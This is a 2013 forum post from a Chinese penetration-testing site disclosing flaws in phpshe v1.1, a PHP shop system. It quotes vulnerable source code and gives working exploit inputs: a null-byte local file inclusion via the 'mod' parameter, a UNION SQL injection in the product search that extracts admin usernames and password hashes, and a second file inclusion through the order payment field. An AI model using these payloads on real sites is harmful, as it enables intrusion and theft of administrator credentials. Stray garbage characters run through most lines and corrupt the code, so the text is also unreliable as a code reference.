中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]

作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
+ X3 k, L# h5 ~3 ?! i, T/* Phpshe v1.1 Vulnerability
( c6 }% m! _* U$ r% r# b6 {/* ========================
' @9 k3 C4 W3 Q/* By: : Kn1f31 F, ~5 `# V* w% H& E$ j9 T7 S
/* E-Mail : 681796@qq.com8 S, I" }& v3 l$ b/ ]! q/ t  k7 C2 B
/*******************************************************/8 K5 {5 T( h% x' m* O* e* x
0×00 整体大概参数传输
% J! K! Z, r  Q9 ^2 Z+ A8 C: M, W . P* X5 w- W' `, r4 r+ G
3 A9 ^& @. f9 F7 u

' B$ ]+ _3 s4 l2 U; U) X//common.php
4 s5 q/ t7 |: Aif (get_magic_quotes_gpc()) {# Y9 @; j5 c8 n1 f7 a$ K
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
6 Z  `6 T  q' F! ~!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');0 y+ {  C4 ?3 f& d- O. [
}! X, r, U; z7 C4 w, e; Z
else {
; T+ {, S4 ^. t!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
+ Y4 U% z+ ~$ T!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');: X1 b7 a2 U! e# X/ A- u( D
}+ T8 Q: m% {+ l
session_start();0 G. Q& }0 H. B9 |
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
- x- t% h! y/ d6 h!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
. x+ i/ I) J/ Q5 r- Z( y7 R
8 Y* t: ^2 k: X; \/ p7 u3 I0×01 包含漏洞6 R! Z: Z3 t$ p, m, i* @
5 e0 A5 G& X& D6 s1 e6 @
2 z" p$ c+ O" S
//首页文件% H$ H1 N; p. A9 x* h7 M5 f
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
) H& n& [. F0 J  iinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
& M4 ?* h; V2 q) [) |9 D6 Hpe_result();, Q2 E  L3 u& f+ I5 {( N( W
?>! X9 x" V/ S# F4 K
//common 文件 第15行开始
3 a9 G# K( D) C. T2 l1 m. m8 Rurl路由配置
0 n$ G; C- X/ n4 J( b$module = $mod = $act = 'index';
, D, R' U5 m( [" H% O/ f! x& d7 @$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);" @4 i' X* P1 h0 J9 i! ]
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);( S8 L4 |! l+ D8 v
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
! ?3 E& H7 a  ?4 z; H8 I//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00# W1 V1 q  T% E5 Q+ g


, ]* J( u% y; m; W7 A
" Z& C8 M0 y) B9 ~# t1 t 0×02 搜索注入, M# G/ Z/ \4 t/ v& t7 ?  M( S

7 b- X4 l, {& _" t/ w# w+ T<code id="code2">

//product.php文件
' V7 F: `( w9 H# Wcase 'list':* l0 X* l8 c6 h: K2 s4 p4 ^( x3 P
$category_id = intval($id);
. M' j1 L# u( l- ^$ u! s$info = $db->pe_select('category', array('category_id'=>$category_id));2 A2 E3 A0 d$ B/ s# S  W; x
//搜索2 [% W! T! b8 ?8 L' `& r( E6 W
$sqlwhere = " and `product_state` = 1";3 ^  Z! N0 u' ?, z: \0 y. }$ G: m' H
pe_lead('hook/category.hook.php');
& @3 i# {3 G/ [$ p8 ~$ ?7 Zif ($category_id) {: [1 L; \3 {9 \3 S
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
) n. h: X- v8 h7 k& w/ E1 V. a}
$ j  x4 r% C. g: \  P2 \6 y" H) @! ?$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤; W) o6 X7 w3 S6 d- d& x
if ($_g_orderby) {
* ^* b, R, n. }* y* p! _: ]$orderby = explode('_', $_g_orderby);
+ n0 n7 T" N) D0 j* ^$ }9 D$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";4 o% ?+ z4 y% D2 I
}0 Z( P2 ?1 [$ p9 P
else {5 T6 c4 ?0 R% Q0 ~3 A
$sqlwhere .= " order by `product_id` desc";- g0 O8 S: E' ]# L6 ?( x3 L
}, F# O8 u9 O  T: P# W
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
5 Q' g. K; F( Q+ \! W$ w  J//热卖排行
  k# Q: D1 b7 i% y# K1 c9 o) @$product_hotlist = product_hotlist();' m$ O- R# h& L- H3 K- N0 S
//当前路径- J# O2 y1 f0 J- L) }
$nowpath = category_path($category_id);. a7 \' x* t; |" d# W
$seo = pe_seo($info['category_name']);# }% n8 ^: O( l, g  K; C
include(pe_tpl('product_list.html'));
5 h& G5 n" L: ^% G; _//跟进selectall函数库
0 L( x0 h1 O2 J+ j3 D3 f* fpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
5 I# L; s+ y+ R  W) C{
3 V, {. ~- b! F& a# r: `1 }: W//处理条件语句) x( ?* k. B! c  n; s  {- v2 N
$sqlwhere = $this->_dowhere($where);
# n9 a; {5 ~2 }8 H+ qreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
! ^: {- ?( E9 b% F4 q5 |+ K4 |}3 D( Q: c8 ~2 n9 ?4 y
//exp
# Z4 e8 D7 B) T+ cproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1) \1 Z2 u0 J( U/ x7 l

</code>
: f: k, Y) ^" F0 l* r
" E+ i! M2 d3 H# P& D, B6 N; K) P0×03 包含漏洞2
. F: s5 ~2 q8 T) C+ T
/ r/ O4 e/ ]0 i8 n<code id="code3">

//order.php

case 'pay':


6 J3 K! u+ m! W. q) [# T1 q$order_id = pe_dbhold($_g_id);

7 |2 \1 L* m9 d! ^! h6 J
$cache_payway = cache::get('payway');


" |" V5 v/ r+ C6 k& Mforeach($cache_payway as $k => $v) {


7 |; H% n" V) c# l4 B$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

& ~  w# {+ ~8 m/ u; |! Y
if ($k == 'bank') {

0 A8 }* Y; q2 j3 S% h6 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

* m- ^/ f+ s0 s+ D; t8 L5 S! o
}

' j) P* [: R, V5 P! X3 Z
}


: X7 W% @! k+ a% F- V! q8 j$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


$ ^0 g1 c( Q% O& n/ o# h. _9 \9 j!$order['order_id'] && pe_error('订单号错误...');


( K' S1 o  O( T) u1 k$ mif (isset($_p_pesubmit)) {


# I3 Q; f; N7 S5 Oif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

( `- |( J6 a- j9 ^
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


; M4 d7 n" y. e7 w# lforeach ($info_list as $v) {


9 d& R0 z6 k: L3 y' y) \$order['order_name'] .= "{$v['product_name']};";: X% s! P1 l& W: A/ H( J


. T) }3 H: z8 u}

+ X; A& L0 N" p: I2 Y$ |
echo '正在为您连接支付网站,请稍后...';


/ K# J: A! ~+ K& ]9 y$ Einclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

: [  X) v% F- O
}//当一切准备好的时候就可以进行"鸡肋包含了"

, Z% ?/ Z5 z( n8 R/ z
else {


# G1 Q6 l: U" L, }pe_error('支付错误...');


& P) h4 }  l/ P}


) c& H- Z3 e/ d}


- e+ ?1 U0 f+ h, F9 ^2 U$seo = pe_seo('选择支付方式');


$ ^7 X7 r6 h1 R0 m2 tinclude(pe_tpl('order_pay.html'));


# J6 q, K! Z% cbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
+ Z: E8 q  T7 }




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2